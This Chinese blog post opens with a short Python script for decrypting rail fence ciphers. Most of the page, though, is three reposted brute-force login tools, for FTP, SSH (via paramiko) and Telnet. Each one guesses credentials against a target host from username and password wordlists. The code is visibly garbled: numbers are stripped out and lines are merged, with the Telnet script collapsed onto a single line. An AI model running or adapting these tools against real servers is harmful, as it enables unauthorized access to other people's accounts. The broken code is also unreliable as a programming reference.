Python脚本暴力破解栅栏密码
admin
2023-07-31 02:34:50
0次
今天遇到一个要破解的栅栏密码,先给大家介绍通用的脚本。
方法一(通用脚本):
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf_ -*-
e = raw_input(‘请输入要解密的字符串\\n‘)
elen = len(e)
field=[]
for i in range(,elen):
if(elen%i==):
field.append(i)
for f in field:
b = elen / f
result = {x:‘‘ for x in range(b)}
for i in range(elen):
a = i % b;
result.update({a:result[a] + e[i]})
d = ‘‘
for i in range(b):
d = d + result[i]
print ‘分为\\t‘+str(f)+‘\\t‘+‘栏时,解密结果为: ‘+d
方法二:
FTP暴力破解脚本
#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = \"\"\"
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ftp_bf.py
[*] Coder :
[*] Version : .
[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
\"\"\"
if sys.platform == \'linux\' or sys.platform == \'linux\':
clearing = \'clear\'
else:
clearing = \'cls\'
os.system(clearing)
R = \"\\[m\";
G = \"\\[m\";
Y = \"\\[m\"
END = \"\\[m\"
def logo():
print G+\"\\n |---------------------------------------------------------------|\"
print \" | |\"
print \" | blog.sina.com.cn/kaiyongdeng |\"
print \" | // ftp_bf.py v.. |\"
print \" | FTP Brute Forcing Tool |\"
print \" | |\"
print \" |---------------------------------------------------------------|\\n\"
print \" \\n [-] %s\\n\" % time.strftime(\"%X\")
print docs+END
def help():
print R+\"[*]-t, --target ip/hostname <> Our target\"
print \"[*]-u, --usernamelist usernamelist <> usernamelist path\"
print \"[*]-p, --passwordlist passwordlist <> passwordlist path\"
print \"[*]-h, --help help <> print this help\"
print \"[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt\"+END sys.exit()
def bf_login(hostname,username,password):
# sys.stdout.write(\"\\r[!]Checking : %s \" % (p))
# sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(hostname,username, password)
ftp.retrlines(\'list\')
ftp.quit()
print Y+\"\\n[!] wt,wt!!! We did it ! \"
print \"[+] Target : \",hostname, \"\"
print \"[+] User : \",username, \"\"
print \"[+] Password : \",password, \"\"+END
return
# sys.exit()
except Exception, e:
pass except KeyboardInterrupt: print R+\"\\n[-] Exiting ...\\n\"+END
sys.exit()
def anon_login(hostname):
try:
print G+\"\\n[!] Checking for anonymous login.\\n\"+END
ftp = FTP(hostname) ftp.login()
ftp.retrlines(\'LIST\')
print Y+\"\\n[!] wt,wt!!! Anonymous login successfuly !\\n\"+END
ftp.quit()
except Exception, e:
print R+\"\\n[-] Anonymous login failed...\\n\"+END
pass
def main():
logo()
try:
for arg in sys.argv:
if arg.lower() == \'-t\' or arg.lower() == \'--target\':
hostname = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == \'-u\' or arg.lower() == \'--usernamelist\':
usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == \'-p\' or arg.lower() == \'--passwordlist\':
passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == \'-h\' or arg.lower() == \'--help\':
help()
elif len(sys.argv) <= :
help()
except:
print R+\"[-]Cheak your parametars input\\n\"+END
help()
print G+\"[!] BruteForcing target ...\"+END
anon_login(hostname)
# print \"here is ok\"
# print hostname
try:
usernames = open(usernamelist, \"r\")
user = usernames.readlines()
count =
while count < len(user):
user[count] = user[count].strip()
count +=
except:
print R+\"\\n[-] Cheak your usernamelist path\\n\"+END
sys.exit()
# print \"here is ok \",usernamelist,passwordlist
try:
passwords = open(passwordlist, \"r\")
pwd = passwords.readlines()
count =
while count < len(pwd):
pwd[count] = pwd[count].strip()
count +=
except:
print R+\"\\n[-] Check your passwordlist path\\n\"+END
sys.exit()
print G+\"\\n[+] Loaded:\",len(user),\"usernames\"
print \"\\n[+] Loaded:\",len(pwd),\"passwords\"
print \"[+] Target:\",hostname
print \"[+] Guessing...\\n\"+END
for u in user: for p in pwd:
result = bf_login(hostname,u.replace(\"\\n\",\"\"),p.replace(\"\\n\",\"\"))
if result != :
print G+\"[+]Attempt uaername:%s password:%s...\" % (u,p) + R+\"Disenable\"+END
else:
print G+\"[+]Attempt uaername:%s password:%s...\" % (u,p) + Y+\"Enable\"+END
if not result :
print R+\"\\n[-]There is no username ans password enabled in the list.\"
print \"[-]Exiting...\\n\"+END
if __name__ == \"__main__\":
main()
SSH暴力破解
#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
from paramiko import SSHClient
from paramiko import AutoAddPolicy
except ImportError:
print G+\'\'\'
You need paramiko module.
http://www.lag.net/paramiko/
Debian/Ubuntu: sudo apt-get install aptitude
: sudo aptitude install python-paramiko\\n\'\'\'+END
sys.exit()
docs = \"\"\"
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ssh_bf.py
[*] Author : xfk
[*] Version : v..
[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
\"\"\"
if sys.platform == \'linux\' or sys.platform == \'linux\':
clearing = \'clear\'
else:
clearing = \'cls\'
os.system(clearing)
R = \"\\[m\";
G = \"\\[m\";
Y = \"\\[m\"
END = \"\\[m\"
def logo():
print G+\"\\n |---------------------------------------------------------------|\"
print \" | |\"
print \" | blog.sina.com.cn/kaiyongdeng |\"
print \" | // ssh_bf.py v.. |\"
print \" | SSH Brute Forcing Tool |\"
print \" | |\"
print \" |---------------------------------------------------------------|\\n\"
print \" \\n [-] %s\\n\" % time.ctime()
print docs+END
def help():
print Y+\" [*]-H --hostname/ip <>the target hostname or ip address\"
print \" [*]-P --port <>the ssh service port(default is )\"
print \" [*]-U --usernamelist <>usernames list file\"
print \" [*]-P --passwordlist <>passwords list file\"
print \" [*]-H --help <>show help information\"
print \" [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]\"+END
sys.exit()
def BruteForce(hostname,port,username,password):
\'\'\'
Create SSH connection to target
\'\'\'
ssh = SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
try:
ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
status = \'ok\'
ssh.close()
except Exception, e:
status = \'error\'
pass
return status
def makelist(file):
\'\'\'
Make usernames and passwords lists
\'\'\'
items = []
try:
fd = open(file, \'r\')
except IOError:
print R+\'unable to read file \\\'%s\\\'\' % file+END
pass
except Exception, e:
print R+\'unknown error\'+END
pass
for line in fd.readlines():
item = line.replace(\'\\n\', \'\').replace(\'\\r\', \'\')
items.append(item)
fd.close()
return items
def main():
logo()
# print \"hello wold\"
try:
for arg in sys.argv:
if arg.lower() == \'-t\' or arg.lower() == \'--target\':
hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
if arg.lower() == \'-p\' or arg.lower() == \'--port\':
port = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == \'-u\' or arg.lower() == \'--userlist\':
userlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == \'-w\' or arg.lower() == \'--wordlist\':
wordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == \'-h\' or arg.lower() == \'--help\':
help()
elif len(sys.argv) <= :
help()
except:
print R+\"[-]Cheak your parametars input\\n\"+END
help()
print G+\"\\n[!] BruteForcing target ...\\n\"+END
# print \"here is ok\"
# print hostname,port,wordlist,userlist
usernamelist = makelist(userlist)
passwordlist = makelist(wordlist)
print Y+\"[*] SSH Brute Force Praparing.\"
print \"[*] %s user(s) loaded.\" % str(len(usernamelist))
print \"[*] %s password(s) loaded.\" % str(len(passwordlist))
print \"[*] Brute Force Is Starting.......\"+END
try:
for username in usernamelist:
for password in passwordlist:
print G+\"\\n[+]Attempt uaername:%s password:%s...\" % (username,password)+END
current = BruteForce(hostname, port, username, password)
if current == \'error\':
print R+\"[-]O*O The username:%s and password:%s Is Disenbabled...\\n\" % (username,password)+END
# pass
else:
print G+\"\\n[+] ^-^ HaHa,We Got It!!!\"
print \"[+] username: %s\" % username
print \"[+] password: %s\\n\" % password+END
# sys.exit()
except:
print R+\"\\n[-] There Is Something Wrong,Pleace Cheak It.\"
print \"[-] Exitting.....\\n\"+END
raise
print Y+\"[+] Done.^-^\\n\"+END
sys.exit()
if __name__ == \"__main__\":
main()
TELNET密码暴力破解
#!usr/bin/python #Telnet Brute Forcer #http://www.darkcde.com #dhydr[at]gmail[dot]com import threading, time, random, sys, telnetlib from copy import copy if len(sys.argv) !=: print \"Usage: ./telnetbrute.py\" sys.exit() try: users = open(sys.argv[], \"r\").readlines() except(IOError): print \"Error: Check your userlist path\\n\" sys.exit() try: words = open(sys.argv[], \"r\").readlines() except(IOError): print \"Error: Check your wordlist path\\n\" sys.exit() print \"\\n\\t dhydr[at]gmail[dot]com TelnetBruteForcer v.\" print \"\\t--------------------------------------------------\\n\" print \"[+] Server:\",sys.argv[] print \"[+] Users Loaded:\",len(users) print \"[+] Words Loaded:\",len(words),\"\\n\" wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != : value = random.sample(words, ) words.remove(value[]) else: print \"\\nReloading Wordlist - Changing User\\n\" reloader() value = random.sample(words, ) users.remove(users[]) lock.release() if len(users) ==: return value[][:-], users[] else: return value[][:-], users[][:-] class Worker(threading.Thread): def run(self): value, user = getword() try: print \"-\"* print \"User:\",user,\"Password:\",value tn = telnetlib.Telnet(sys.argv[]) tn.read_until(\"login: \") tn.write(user + \"\\n\") if password: tn.read_until(\"Password: \") tn.write(value + \"\\n\") tn.write(\"ls\\n\") tn.write(\"exit\\n\") print tn.read_all() print \"\\t\\nLogin successful:\",value, user tn.close() work.join() sys.exit() except: pass for I in range(len(words)*len(users)): work = Worker() work.start() time.sleep()
相关内容
热门资讯
500 行 Python 代码...
语法分析器描述了一个句子的语法结构,用来帮助其他的应用进行推理。自然语言引入了很多意外的歧义,以我们...
定时清理删除C:\Progra...
C:\Program Files (x86)下面很多scoped_dir开头的文件夹 写个批处理 定...
65536是2的几次方 计算2...
65536是2的16次方:65536=2⁶
65536是256的2次方:65536=256
6553...
Mobi、epub格式电子书如...
在wps里全局设置里有一个文件关联,打开,勾选电子书文件选项就可以了。
scoped_dir32_70...
一台虚拟机C盘总是莫名奇妙的空间用完,导致很多软件没法再运行。经过仔细检查发现是C:\Program...
pycparser 是一个用...
`pycparser` 是一个用 Python 编写的 C 语言解析器。它可以用来解析 C 代码并构...
小程序支付时提示:appid和...
[Q]小程序支付时提示:appid和mch_id不匹配
[A]小程序和微信支付没有进行关联,访问“小...
微信小程序使用slider实现...
众所周知哈,微信小程序里面的音频播放是没有进度条的,但最近有个项目呢,客户要求音频要有进度条控制,所...
python绘图库Matplo...
本文简单介绍了Python绘图库Matplotlib的安装,简介如下:
matplotlib是pyt...
Prometheus+Graf...
一,Prometheus概述
1,什么是Prometheus?Prometheus是最初在Sound...